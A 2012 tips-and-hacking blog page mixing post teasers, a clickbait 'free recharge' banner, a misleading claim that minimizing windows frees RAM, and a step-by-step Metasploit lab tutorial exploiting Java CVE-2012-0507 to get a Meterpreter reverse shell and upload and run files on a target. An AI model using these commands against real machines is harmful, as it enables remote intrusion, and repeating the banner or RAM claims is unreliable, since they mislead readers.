FREE RECHARGE TRICKS

To view Free mobile Recharge Tricks Click on the above photo on this page.
Find out the images and click to get the recharge code.
Try now. It works.>> Click On the right side photo.>>>>

Saturday, May 19, 2012

Latest Hacking Tricks


     Latest entries
Nokuntu managing Nokia phones in Linux

Nokuntu managing Nokia phones in Linux

Nokuntu is a program for managing Nokia phones in Linux. It is similar to Windows Nokia PC Suite, Why because Nokia does not develop any special PC suite for Linux, why because Linux releases tier update periodically, Where the hardware and software support form Linux developer s should frequently updated, By using this software ,...
How to change template / themes in Blogger

How to change template / themes in Blogger

Welcome Blogger, You surely a newbie i thing since you landed here, Now Let we see how to Instal a New Blogger template in Blogger, While choosing a Blogger Template, It should Clear, Concise and SEO friendly, If the Blogger template is in white color, You content should high, these are all small hints, Steps...
Best Anti-Virus Collections Software for Linux Operating System

Best Anti-Virus Collections Software for Linux Operating System

Linux is build with a hard and best kernel which is not simply affected by vulnerable,But usually some vulnerable holes are that resides on it, Hackers only targeted to find this types of vulnerable to hack of spoil those useful software, Anyhow, Let we see some useful ant-virus solutions for Linux, Avast Linux Home Edition...
Google Wishes Happy Mother's day with a lovely Doodle

Google Wishes Happy Mother’s day with a lovely Doodle

First of all, Happy Mothers Day, The wonderful god who make us to visit this wonderful world, and make us to survive in the world, The only Living God is our mother, we are nothing without our mother, Today Worlds Mothers day, Since Everyone Celebrating the Mother’s day by Wishing there mothers and make happy...
How to use Google Drive Step By Step Procedure

How to use Google Drive Step By Step Procedure

Google Released their wonderful service Google Drive, So everyone want to use including me, But how, Since now i going to explain how to use / instal Google Drive , Via Google Drive ,Google offers us 5 GB online Storage. You can upload and sync your own files on your account, and also access anywhere...
The Most Expected Google Drive from Search Engine Giants is now Officially released, Download Now to sync

The Most Expected Google Drive from Search Engine Giants is now Officially released, Download Now to sync

Google drive Is an Online Cloud storage which offers 5 GB Disk space on their Google Servers, Google-The Search engine Giants Finally Step forward with online cloud storage with a heavy competition with Dropbox, Skydrive (microsoft ), iCloud (apple), Box.net, iDrive, etc.   Google Drive Offers 5 GB Online Storage, Google Drive is a free...
Fake Call Free Application for iPhone 3Gs,iPhone 4s,iPod touch and iPad

Fake Call Free Application for iPhone 3Gs,iPhone 4s,iPod touch and iPad

Free Fake call application, Help you to escape from people ,who you want to ignore by means of attending a fake phone call, It allows you to setup a fake call and it really seems like someone calling with their own name and time that we have setup as prior, It make a fake call...
How to Bring Back Start Menu in Windows 8

How to Bring Back Start Menu in Windows 8

“Where is the Start button in Windows 8 ?”, This is the first question Ever asked by Everyone after get installing the windows 8, Yes. Because the start button has been removed from Taskbar by Microsoft windows 8 team, Why because they introduced the Better and Surface based Start menu for Windows 8, The Windows...
How to Know Malicious Link Before Clicking it in Search Engines

How to Know Malicious Link Before Clicking it in Search Engines

Nowadays the browsing get worse and irritating with most malicious program,Scripts and advertisement, Also we don’t know what type of website is that, Probably we make searches through Google, Yahoo, Bing, Where these are plays a vital role, Since these search engine also filters a good safer result for their visitors, But sometimes they fail,...
How to Convert Images to Icon .ico Files Without Any Software ( Online )

How to Convert Images to Icon .ico Files Without Any Software ( Online )

Converting icon file from any image surely requires some software’s, Since designing icon file is also a not a simple thing, It requires much knowledge, Where if you have skill to develop any gif, png, jpg, etc means, Just go up, Design your icon in any your desired picture, After finishing that, i know you...
How to Shut down, Restart, Log off, Sleep and Hibernate in Windows 8

How to Shut down, Restart, Log off, Sleep and Hibernate in Windows 8

Hello Techies, I surely know you have been struggled while shutting down your windows 8, At beginning of using Windows 8, Am also struggled on this, I searched Everywhere how to Shutdown this PC, huh, How long i search for this stupidity, Finally i hit a power button on my Personal computer which makes my...
Why I Have To Switch Linux Operating System

Why I Have To Switch Linux Operating System

Windows is the wide and most using operating system ,First also we know What is Operating system, But how long we addict with Microsoft Products? Even though Microsoft products are priceware but it is user friendly, for this reasons we are going for Microsoft products ( Including me also ), But this is an good...

Internet Browsing tips and Tricks

Internet Browsing tips and Tricks

          The internet tips here is really gonna help those who have less internet speed such as 64 Kbps or 128 Kbps. In India we usually have Less Internet speed Isp's. So Follow each and every Internet Tricks here, to Improve your internet speed to some extent.
        Internet Browser Tips and Tricks
Speed up your internet by 20%

Increase Internet Speed

Boost Up Your Firefox Speed

Access Internet using Ms Calculator

Yahoo Hacks & Tricks

Multiple login in yahoo without any software 

Find the IP address of the sender in Gmail, Yahoo! mail or Hotmail

Hidden Emotions In Yahoo

Find Who is Invisible on Yahoo

Multi Google Talk

Mozilla Firefox & Internet Explorer

Boost Up Your Firefox Speed

Internet Explorer Hotkeys | keyboard Shortcuts

Mozilla Firefox Hotkeys | Keyboard Shortcuts

Increase your RAM and so system speed


1). Start any application, say Word. Open some large documents.

2). Press
CTRL+SHIFT+ESC to open Windows Task Manager and click Processes tab and sort the list in descending order on Mem Usage. You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory.
 
3). Now switch to Word and simply minimize it. (Don't use the Minimize All Windows option of the task bar).
 
4). Now go back to the Windows Task Manager and see where WINWORD.EXE is listed. Most probably you will not find it at the top. You will typically have to scroll to the bottom of the list to find Word. Now check out the amount of RAM it is using. Surprised? The memory utilization has reduced by a huge amount.
 
5). Minimize each application that you are currently not working on by clicking on the Minimize button & you can increase the amount of available RAM by a substantial margin. Depending upon the number and type of applications you use together, the difference can be as much as 50 percent of extra RAM.
                In any multitasking system, minimizing an application means that it won't be utilized by the user right now. Therefore, the OS automatically makes the application use virtual memory & keeps bare minimum amounts of the code in physical RAM.

Download Hash Code Verifier v1.0 : A tool to verify the File Integrity

Hello BTS Readers,
we are happy to announce that we have released our second security tool 'Hash Code Verifier'.  Hash Code Verifier is a Cross-platform application to verify the Integrity of your download files. Hash Code verifier can be very useful if you want to check if a downloaded file is original and not corrupted or modified by hackers.

In order prevent users from such problem, websites often publish MD5 or SHA hash of the file so that users can ensue that a file has not been modified by checking the file's hash value . Hash Code verifier can generate hash for a file and allow user to check with the provided hash value.


Features:

  • Verify the Hash of a file
  • Calculate hash for multiple files
  • Compare Two files
  • Simply Drag and drop files from computer into the application for generating hash.
  • Supports MD5,SHA1,SHA256,SHA512 and CRC32 hash codes.
  • Save the generated hash list in a text/HTML format
  • Automatically generate hash when you browse or drop the files.
  • Yes, it is Cross-platform(You can use this application in any Operating system)

System Requirements:
Operating System: All OS(windows xp,7, Linux,Mac,....)
Java Runtime Environment: JRE 1.6 or higher version is required.(you can get it from oracle.com)


Screenshots:


How to hack remote computer using Metasploit? Exploiting Java vulnerability CVE-2012-0507



Whenever someone say PenTesting tool, the first thing come in our mind is MetaSploit . Today, i am going to demonstrate how to use the Metasploit tool to exploit the popular java vulnerability(CVE-2012-0507).
About MetaSploit:
Metsploit is a very Powerful PenTesting Tool . Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. Very useful tool for Information Gathering, Vulnerability Scanning, Exploit Development, Client side exploits,...
Mastering the Framework: A free course from Offensive-Security
The Offensive Security Team along with several active community members, made a free course on the Metasploit Framework "Mastering the Framework". The course covers Information gathering, Social engineering attacks, exploit development, Advance AV avoidance and etc...

The course is available here:
www.offensive-security.com/metasploit-unleashed/Introduction

Donate to HFC, Feed a Child!
The "Mastering the Framework" is free course. If you enjoyed the course, please donate to Hackers for Charity(HFC). Beyond merely providing food for children in need in East Africa, the Hackers for Charity Food Program enables children and their families to provide for themselves and become more self-sufficient by teaching them valuable agricultural skills. Every cent received is directly sent Hackers for Charity in support of their mission. Any amount, no matter how small, makes a difference; it only takes $9.00 to feed a child for a month.

You can find further details about the donation here:
http://www.offensive-security.com/metasploit-unleashed/Donate

Hey, where are you going?! Wait a Sec, take that course Once i demonstrate how to use the metasploit. Because, It will be hard to understand or boring, if you read those things directly.

Requirements:
  • VirtualBox 
  • Target OS(windows,...)
  • PenTesting Distro(Backtrack )
  • JRE 6(unpatched version)

CVE-2012-0507 is a vulnerability in the JRE due to the fact that The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. A malicious Java application or applet could use this flaw to cause Java Virtual Machine(JVM) to crash or bypass Java sandbox restrictions.

Security News: This vulnerability affects Windows, Mac and Linux operating systems. Last month, Flashback malware infect more than 600,000 Mac computers by exploiting this vulnerability. Recently, The INSS , The Amnesty International UK websites injected with malicious code that exploit the CVE-2012-0507.
I am going to demonstrate this vulnerability with VirtualBox.  I have setup two Virtual Machines namely "Target" and "BT5". I have installed XP 2 in the Target and Backtrack 5 R2 in the 'BT5'.

(need help in configuring the VM?, read this: setup PenTesting Lab).

Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and Type "msfupdate".  This will update the Metasploit Framework(MSF) with the latest exploits and Payloads. As CVE-2012-0507 is latest vulnerability, you have to update the MSF before proceeding further.

slow Internet Connection?! If you have slow internet connection, then you can download the java_atomicreferencearray module alone instead of updating all modules.
Download the java_atomicreferencearray.rb and paste in this folder "/opt/metasploit/msf3/modules/exploits/multi/browser/"

Then, Download CVE-2012-0507.jar and paste in this folder "/opt/metasploit/msf3/data/exploits/"

Part III : Exploiting Java vulnerability CVE-2012-0507:


Step 1:
Open the Terminal and type "msfconsole".  This will bring the Metasploit console , here you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray" . This command will use the java_atomicreferencearray.rb module for the attack.


Now type "show options" to display the which settings are available and/or required for this specific module.



Now type "set SRVPORT 80".
and  "set URIPATH /".



Step 3: Set Payload
Type "show payloads", this will displays the list of payloads.  We are going to use the 'reverse_tcp' payload. This payload will get reverse tcp connection from the Target to PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.


set LHOST [IP_address] :  In order to get reverse connection, we have to set our IP in the LHOST. 

open the Terminal and type "ifconfig". This will display the IP info of our PenTesting Machine.  The IP will be "192.168.56.x".   For instance, let me say the ip is 192.168.56.10.

Now  Type in the msfconsole as "set LHOST 192.168.56.10".



Part IV: Breaching the Target Machine:

So , are you ready?! Let us break into the Target Machine.

Step 1:

Type "exploit" in the msfconsole. This will start the reverse handler to our Machine and it will wait anyone that will connect to the our HTTP server (Eg: http://192.168.56.10). Once victim connect to our server, it will send a jar will that will exploit the CVE-2012-0507 vulnerability.

step 2:

Open the Firefox/IE in the Target machine. 
Enter "http://192.168.56.10".
It loads nothing but exploit will run in the background.
Step 3:
Open the BT5 machine, it will display the following output:


Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control with the Target.



Step 4:Upload files
Yeeeh..! we got backdoor to the Target machine, now we can run any commands in the Target.



For Example, Typing 'sysinfo' will display the system information.


You can also upload and execute your own executable files in the Target machine.

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.


Security Tips:
Update your JRE to the latest version.


conclusion:
I hope this article has given you a good insight into how to use MetaSploit Framework to exploit the Java vulnerability.  I hope this will help you to get into the PenTesting world..!

So, you enjoyed the Tutorial , right?! If you have any suggestion or have doubt, please drop your comment/mail me.

Computer Tips - Hacking Tricks - Internet Tweaks and Hacking Computer Speed Introduction



Welcome to the web's most helpful Online Free computer tips and tricks website. This site contains all Latest and Cool Computer tricks as well as some Internet Tricks, Registry tricks, Orkut tricks, Windows tips to customize and Optimize the performance of the system by tweaking or tricking the windows registry keys. Solve your computer problems by browsing the website for related Computer solution.

All tips work well in both Windows XP as well as windows vista or win 7 operating systems. Need some Computer Help or any computer assistance in troubleshooting any errors or problems, you are almost welcome to contact hack2007. These windows registry edits and internet Hacks are safe to try and are free from any virus or Spyware. Here at Hack2007 you are going to learn from Basic Computer tips to Advanced computer tips and Computer Hacking that will help you to be a computer master on your own. All the computer tips at Hack2007 are very interesting and are mainly meant for education purpose. Visit my new Computer Tips Blog and leave your comments and suggestions.

g a